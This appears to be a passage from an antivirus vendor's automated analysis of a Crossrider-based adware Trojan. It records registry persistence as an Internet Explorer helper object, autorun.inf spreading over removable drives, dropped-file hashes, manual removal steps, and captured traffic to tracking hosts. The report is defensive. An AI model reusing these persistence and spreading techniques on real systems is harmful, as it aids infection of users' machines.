"(Default)" = "CrossriderApp0061915.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915"

[HKCR\CrossriderApp0061915.BHO.1]
"(Default)" = "CrossriderApp0061915"

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0]
"(Default)" = "CrossriderApp0061915 Type Library"

[HKCR\Interface\{55555555-5555-5555-5555-550655195515}]
"(Default)" = "ICrossriderBHO"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915.Sandbox"

[HKCR\CrossriderApp0061915.Sandbox.1]
"(Default)" = "CrossriderApp0061915.Sandbox"

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"

[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"

[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"Version" = "1.0"

[HKCR\CrossriderApp0061915.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"

[HKCR\CrossriderApp0061915.BHO]
"(Default)" = "CrossriderApp0061915"

[HKCR\CrossriderApp0061915.BHO\CurVer]
"(Default)" = "CrossriderApp0061915"

[HKCR\CrossriderApp0061915.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
"(Default)" = "CrossriderApp0061915.BHO.1"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
"(Default)" = "Sense"

[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0061915.Sandbox]
"(Default)" = "CrossriderApp0061915.Sandbox"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 3B 0C 9A BD EC 6C 81 F8 3D 71 2E D5 D3 9D 32"

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]
"(Default)" = ""

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
"(Default)" = "CrossriderApp0061915.Sandbox.1"

[HKCR\CrossriderApp0061915.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\0\win32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"

[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"

[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
"(Default)" = "CrossriderApp0061915.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"Version" = "1.0"

[HKCR\CrossriderApp0061915.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"

[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
"NoExplorer" = "1"

"(Default)" = "CrossriderApp0061915"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]

Dropped PE files

MD5	File path
5ea67e0c698c6aa0edc4c05f0ea7a968	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe
00a0194c20ee912257df53bfe258ee4a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll
7d8a3f7a171be884783cab827f170855	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe
c4fd010850fca98b91b2b1f69adc5dbe	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\WrapperUtils.dll
0f962c0a31b227e06eb817f1e97a46c5	c:\ljssj.pif

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):

   GoogleUpdate.exe:2616
   GoogleUpdate.exe:2788
   GoogleUpdate.exe:2396
   GoogleUpdate.exe:3060
   GoogleUpdate.exe:2140
   GoogleUpdate.exe:3724
   GoogleUpdate.exe:2504
   a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
   %original file name%.exe:312
   a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
   Sense-codedownloader.exe:3400
   Sense-codedownloader.exe:3032
   a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
   Tkbjndnqomlxl.exe:2840
   regsvr32.exe:2328
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:

   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\MSIa82cb.LOG (474 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
   %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (940 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
   %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (936 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
   %Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
   %Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
   %WinDir%\system.ini (70 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\WrapperUtils.dll (1856 bytes)
   C:\autorun.inf (228 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe (75544 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe (4202874 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (561 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (332415 bytes)
   %System%\drivers\ktonn.sys (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (561 bytes)
   %Program Files%\Common Files\Java\Java Update\jusched.exe (272 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (15019 bytes)
   C:\totalcmd\TOTALCMD.EXE (1728 bytes)
   C:\ljssj.pif (99 bytes)
   %Program Files%\Common Files\Adobe\ARM\1.0\AdobeARM.exe (12 bytes)
   %Program Files%\Adobe\Reader 9.0\Reader\Reader_sl.exe (840 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\StdUtils.dll (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Smpcpq.tmp (308806 bytes)
   %Program Files%\Sense\background.html (729 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\22.js (8 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\14.js (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\37.js (2 bytes)
   %Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe (2321 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\update.json (39 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\StdUtils.dll (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\42.js (7 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\184.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\md5dll.dll (6 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\182.js (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils2.dll (3616 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psuser.dll (673 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\17.js (2392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateOnDemand.exe (46 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateBroker.exe (46 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\183.js (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\nsisos.dll (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\45.js (1 bytes)
   %Program Files%\Sense\Uninstall.exe (601 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\191.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\39.js (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\123.js (1 bytes)
   %Program Files%\Sense\1293297481.mxaddon (1552 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\9.js (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\13.js (6 bytes)
   %Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.xpi (1425 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\46.js (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\269.js (493 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\ExecDos.dll (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\281.js (485 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\npGoogleUpdate4.dll (1281 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\93.js (953 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\91.js (6360 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\207.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\UserInfo.dll (4 bytes)
   %Program Files%\Sense\Sense-codedownloader.exe (3361 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdateres_en.dll (26 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\242.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\41.js (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (1064979 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\177.js (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psmachine.dll (673 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\3.js (63 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\263.js (1 bytes)
   %Program Files%\Sense\Sense-bg.exe (5441 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\35.js (9 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateHelper.msi (673 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdate.exe (601 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\239.js (869 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\64.js (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\78.js (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdate.dll (5441 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\192.js (869 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\223.js (825 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins.json (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils.dll (27704 bytes)
   %Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe (14988 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\1.js (9 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\244.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\inetc.dll (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
   %WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (138 bytes)
   %WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-1.job (70 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\125401 (279876 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\94.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\38.js (2 bytes)
   %Program Files%\Sense\042abe8f-d024-483d-b16f-b35d66d1d726.crx (1425 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\72.js (1552 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\2.js (63 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\43.js (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\221.js (415 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\102.js (1 bytes)
   %WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-11.job (76 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\background.js (429 bytes)
   %Program Files%\Sense\utils.exe (71614 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\40.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\44.js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\220.js (784 bytes)
   %WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (70 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\extension.js (613 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\36.js (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\47.js (7 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\246.js (7 bytes)
   %Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.crx (1425 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\4.js (3312 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\180.js (1 bytes)
   %Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe (9098 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\28.js (536 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\manifest.xml (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\21.js (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleCrashHandler.exe (601 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\226.js (510 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\7.js (685 bytes)
   %Program Files%\Sense\Sense-bho.dll (4545 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (465960 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\262.js (1 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 12.1.12.2
File Description: Isawirmknh
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 12.1.12.2File Description: IsawirmknhComments: Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	34880	35328	4.14496	673c97bebf576db6879567a0bfd3908a
.data	40960	140	512	0.818128	a5a710a52d844b19513b2cab5693dbc3
.rdata	45056	9108	9216	4.0908	004265d16597098398ce8e06897dcd29
.bss	57344	252880	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	311296	4868	5120	3.64756	20f692042b54593897a705a64d67ce50
.ndata	319488	409600	8192	0	0829f71740aab1ab98b33eae21dee122
.rsrc	729088	94208	91136	5.39469	1a1166481991566210d96a66548e9d17

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000803/update.json
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl
hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl
hxxp://update.loadgenclientservice.com/installer_updates/000803/update.json	69.16.175.42
hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl	23.9.117.163
hxxp://logs.loadgenclientservice.com/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378	69.16.175.10
hxxp://stats.loadgenclientservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380	176.32.100.244
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt	23.15.4.9
hxxp://crl.thawte.com/ThawteTimestampingCA.crl	23.9.117.163

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /tss-ca-g2.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: ts-crl.ws.symantec.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "9f824b3499ed210c19a35d1d0c0598f6:1411204296"

Last-Modified: Sat, 20 Sep 2014 09:11:36 GMT

Date: Sat, 20 Sep 2014 18:23:25 GMT

Content-Length: 477

Connection: keep-alive

Content-Type: application/pkix-crl

0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..140920090109Z..140930090109Z.00.0...U.#..0..._..n\..t...}.?..L...0...U.......P0...*.H..................5.....M....g..0..M..E}.0j`U..A.\ubg.k..s...s..Jo..:......j..]..B.....o......<N>7.D.GB..4.P..]*,...l..c..&^F.E..Xds..L..g...h.*..w2....7..NK=......8rRV6G.:.g....E.BT.....M.-h.U._.99H.l.....;.....W0...w..\epi..jYM.B....h.....ww...#..,....yK.3.r#C!..d...HTTP/1.1 200 OK..Server: Apache..ETag: "9f824b3499ed210c19a35d1d0c0598f6:1411204296"..Last-Modified: Sat, 20 Sep 2014 09:11:36 GMT..Date: Sat, 20 Sep 2014 18:23:25 GMT..Content-Length: 477..Connection: keep-alive..Content-Type: application/pkix-crl..0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..140920090109Z..140930090109Z.00.0...U.#..0..._..n\..t...}.?..L...0...U.......P0...*.H..................5.....M....g..0..M..E}.0j`U..A.\ubg.k..s...s..Jo..:......j..]..B.....o......<N>7.D.GB..4.P..]*,...l..c..&^F.E..Xds..L..g...h.*..w2....7..NK=......8rRV6G.:.g....E.BT.....M.-h.U._.99H.l.....;.....W0...w..\epi..jYM.B....h.....ww...#..,....yK.3.r#C!..d.....

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT

Accept-Ranges: bytes

ETag: "806f4cbb43dcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=9148

Date: Sat, 20 Sep 2014 18:23:24 GMT

Connection: keep-alive

X-CCC: US

X-CID: 2

1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 18..Cache-Control: max-age=9148..Date: Sat, 20 Sep 2014 18:23:24 GMT..Connection: keep-alive..X-CCC: US..X-CID: 2..1401CF3DB40B609892..

GET /monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 HTTP/1.1

Host: logs.loadgenclientservice.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 20 Sep 2014 18:23:19 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1411237399.dop012.am4.t,1411237399.cds058.am4.c

